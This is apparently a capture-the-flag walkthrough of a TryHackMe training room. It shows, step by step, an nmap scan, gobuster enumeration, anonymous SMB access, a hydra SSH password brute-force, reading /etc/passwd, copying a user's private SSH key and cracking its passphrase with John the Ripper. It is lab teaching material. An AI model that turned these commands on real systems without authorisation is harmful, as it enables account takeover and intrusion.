Try Hack Me - Basic Pentesting
This is a machine that allows you to practise web app hacking and privilege escalation
Howdy my fellow Cyber Enthusiasts! Welcome to another room Try Hack Me offers! So let's dive in! π You can click on the "Start AttackBox" button for a Linux machine to be available on the right-side of your page, so you can follow this walkthrough.
Let's dive in and start with an Nmap scan to our target machine.
π‘
Find the services exposed by the machine
$ IP=10.112.130.0
sudo nmap -sV -p- $IP
Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-11 17:26 +0300
Nmap scan report for 10.112.130.0
Host is up (0.051s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.05 secondsπ‘
What is the name of the hidden directory on the web server(enter name without /)?
We are going to use Gobuster for that.
π‘
Gobuster is a fast, open-source command-line tool written in Go that is commonly used for directory, DNS, virtual host, and S3 bucket enumeration during web security testing and reconnaissance.
Security professionals and system administrators use it to discover hidden:
- Web directories and files (
- Subdomains (
- Virtual hosts
- Cloud storage buckets
Security professionals and system administrators use it to discover hidden:
- Web directories and files (
/admin, /backup.zip)- Subdomains (
dev.example.com)- Virtual hosts
- Cloud storage buckets
$ gobuster dir -u $IP:80 -w /usr/share/dirb/wordlists/big.txt
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.112.130.0:80
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
.htpasswd (Status: 403) [Size: 277]
.htaccess (Status: 403) [Size: 277]
[redacted] (Status: 301) [Size: 318] [--> http://10.112.130.0/[redacted]/]
server-status (Status: 403) [Size: 277]
Progress: 20469 / 20469 (100.00%)
===============================================================
Finished
===============================================================π‘
User brute-forcing to find the username & password
Navigate to the hidden directory using your web browser and see if you can find anything useful.
http://10.112.130.0/[redacted]/There are two .txt files inside it.
It isn't really helpful. Remember our nmap scan?
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4Let's try to connect using smbclient.
$ smbclient //$IP/anonymous
Password for [WORKGROUP\learn]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Apr 19 20:31:20 2018
.. D 0 Thu Apr 19 20:13:06 2018
staff.txt N 173 Thu Apr 19 20:29:55 2018
14282840 blocks of size 1024. 6256644 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)$ cat staff.txt
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, [redacted]!)
-[redacted]Nice. We have two usernames now. Let's try to bruteforce them for passwords.
$ hydra -t 16 -l jan -P /usr/share/wordlists/rockyou.txt ssh://$IP
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-05-11 17:48:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.112.130.0:22/
[STATUS] 218.00 tries/min, 218 tries in 00:01h, 14344185 to do in 1096:40h, 12 active
[STATUS] 205.67 tries/min, 617 tries in 00:03h, 14343786 to do in 1162:23h, 12 active
[22][ssh] host: 10.112.130.0 login: [redacted] password: [redacted]
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-05-11 17:52:12π‘
What is the username?
We found the credentials using hydra.
π‘
What is the password?
We found the credentials using hydra.
π‘
What service do you use to access the server (answer in abbreviation in all caps)?
Again, the answer lies in our Nmap scan.
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)π‘
SSH (Secure Shell) is a cryptographic network protocol used to securely access and manage remote computers over an unsecured network. SSH is widely used by system administrators, developers, and cloud engineers to manage Linux servers and network devices securely.
π‘
Enumerate the machine to find any vectors for privilege escalation
Let's connect using our SSH credentials.
$ ssh [redacted]@$IPπ‘
What is the name of the other user you found(all lower case)?
We can see the contents of /etc/passwd to find the other user in the machine.
$ cat /etc/passwd
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
[redacted]:x:1000:1000:[redacted],,,:/home/[redacted]:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
tomcat9:x:999:999::/home/tomcat9:/bin/false
[redacted]:x:1001:1001::/home/[redacted]:/bin/bashπ‘
If you have found another user, what can you do with this information?
There is a /home directory with the new user. Let's go there and try to find something useful.
[redacted]@ip-10-112-130-0:/home/[redacted]$ ls -la
total 48
drwxr-xr-x 5 [redacted] [redacted] 4096 Apr 23 2018 .
drwxr-xr-x 5 root root 4096 May 11 10:20 ..
-rw------- 1 [redacted] [redacted] 789 Jun 22 2025 .bash_history
-rw-r--r-- 1 [redacted] [redacted] 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 [redacted] [redacted] 3771 Apr 17 2018 .bashrc
drwx------ 2 [redacted] [redacted] 4096 Apr 17 2018 .cache
-rw------- 1 [redacted] [redacted] 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 [redacted] [redacted] 4096 Apr 23 2018 .nano
-rw------- 1 [redacted] [redacted] 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 [redacted] [redacted] 655 Apr 17 2018 .profile
drwxr-xr-x 2 [redacted] [redacted] 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 [redacted] [redacted] 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 [redacted] [redacted] 538 Apr 23 2018 .viminfo
[redacted]@ip-10-112-130-0:/home/[redacted]$ cd .ssh
[redacted]@ip-10-112-130-0:/home/[redacted]/.ssh$ ls -la
total 20
drwxr-xr-x 2 [redacted] [redacted] 4096 Apr 23 2018 .
drwxr-xr-x 5 [redacted] [redacted] 4096 Apr 23 2018 ..
-rw-rw-r-- 1 [redacted] [redacted] 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 [redacted] [redacted] 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 [redacted] [redacted] 771 Apr 19 2018 id_rsa.pubGreat! We have an .ssh folder. Let's grab these files, give them the necessary permissions and try to connect.
id_rsa
id_rsa.pub
$ chmod 600 id_rsassh -i id_rsa [redacted]@$IP
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Enter passphrase for key 'id_rsa':We are asked for a password. Let's crack it! π
$ ssh2john id_rsa > key.hashπ‘
John the Ripperβs
ssh2john is a utility script that extracts password hashes from encrypted SSH private keys and converts them into a format that John the Ripper can attempt to crack.$ john key.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
No password hashes left to crack (see FAQ)
$ john --show key.hash
id_rsa:[redacted]Great! π We now have the ssh password of our user. Let's use that to connect to the machine.
π‘
What is the final password you obtain?
$ ssh -i id_rsa [redacted]@$IP
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Enter passphrase for key 'id_rsa':
$ [redacted]@ip-10-112-130-0:~$ pwd
/home/[redacted]
[redacted]@ip-10-112-130-0:~$ ls
pass.bak
[redacted]@ip-10-112-130-0:~$ cat pass.bak
[redacted]Congratulations! You have solved this room! π π π